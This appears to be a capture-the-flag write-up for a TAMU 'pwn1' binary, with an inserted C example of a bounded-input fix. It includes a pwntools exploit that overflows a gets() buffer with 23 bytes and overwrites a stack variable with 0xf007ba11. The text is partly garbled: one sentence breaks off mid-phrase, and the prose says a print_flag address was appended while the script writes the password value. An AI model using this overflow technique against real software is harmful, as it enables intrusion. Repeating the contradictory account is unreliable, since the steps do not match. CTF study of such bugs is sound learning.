pwn1 asks the user to enter a passphrase.
```text
This is a super secret program
Noone is allowed through except for those who know the secret!
What is my secret?
WHAT_DO_I_KNOW?
That is not the secret word!
```
So, I assume there will be some check somewhere.
I checked the output of the strings command to see if there is a password hardcoded into the program.
Nope, but nice try.
It's time to give radare2 a chance. Let's analyse…
The input is useless because it is stored in eax… but the check against the password (which is \xf0\x07\xba\x11) is performed on a local variable set to 0.
So, how can I pwn it?
Easy peasy! There is a gets without a length check: this means that I can write to portions of the stack and do whatever I want with this program.
Even better, there is no canary!
I can write the password in the correct memory cell.
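The layout described above, as an added C sketch that is not the challenge's source (the binary's code is not on this page): a local variable initialised to 0 sits next to the 23-byte input buffer, and the read is done through a bounded fgets instead of gets, so an over-long line is cut and drained rather than spilling onto the neighbouring stack slot. The constant SECRET, the buffer size BUF_LEN and the function names are assumptions based on the write-up; the check stays false because, as the write-up notes, the page shows nothing that ever sets the local to the expected value.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() used by callers of the demo */
#include <stdio.h>
#include <string.h>

#define BUF_LEN 23                /* buffer size the write-up found with radare2 */
#define SECRET  0xf007ba11u       /* value the check compares against (from the write-up) */

enum { PW_EOF = -1, PW_OK = 0, PW_TRUNCATED = 1 };

/*
 * Bounded replacement for gets(): reads at most buflen-1 bytes, strips the
 * newline, and discards the rest of an over-long line so the next read is
 * not fed the leftovers. Returns PW_TRUNCATED when the input had to be cut.
 */
int read_passphrase(FILE *in, char *buf, size_t buflen)
{
    if (buflen == 0 || fgets(buf, (int)buflen, in) == NULL) {
        if (buflen)
            buf[0] = '\0';
        return PW_EOF;
    }
    size_t n = strcspn(buf, "\n");
    int truncated = (buf[n] != '\n');
    buf[n] = '\0';
    if (truncated) {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;                                   /* drain the rest of the line */
    }
    return truncated ? PW_TRUNCATED : PW_OK;
}

/*
 * Mirrors the layout the write-up describes: a local variable initialised to
 * 0 next to the input buffer. With gets() an over-long line could overwrite
 * it; with the bounded read it can only change through program logic, so the
 * function returns 1 only if auth was set to SECRET by that logic.
 */
int check_passphrase(FILE *in)
{
    volatile unsigned int auth = 0;   /* hypothetical stand-in for the zeroed local */
    char buf[BUF_LEN];

    read_passphrase(in, buf, sizeof buf);
    return auth == SECRET;
}

int main(void)
{
    printf("This is a super secret program\nWhat is my secret? ");
    fflush(stdout);
    if (check_passphrase(stdin))
        puts("You know the secret!");
    else
        puts("That is not the secret word!");
    return 0;
}
```

Feeding the bounded version a line longer than BUF_LEN leaves auth untouched; the same line through gets() would have written past the buffer, which is the defect the write-up exploits. Draining the remainder of a cut line matters too: without it, the leftover bytes become the next prompt's answer.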
The exploit is some gibberish and then the address of the
BE CAREFUL: I assumed ASLR was disabled on the server.
So I opened a shell with ASLR disabled, got the address of
print_flag and appended it to the exploit string.
My assumption was correct! There is no ASLR on server side.
I used pwntools for crafting and simplicity. This is the script:

```python
from pwn import *

exc = remote('pwn.ctf.tamu.edu', 4321)
# 23 bytes of filler to reach the local variable, then the expected value
exc.sendline(b'A' * 23 + p32(0xf007ba11))
exc.interactive()
```

23 is the length of the input string buffer on the stack (found with radare2).
Flag captured ;-)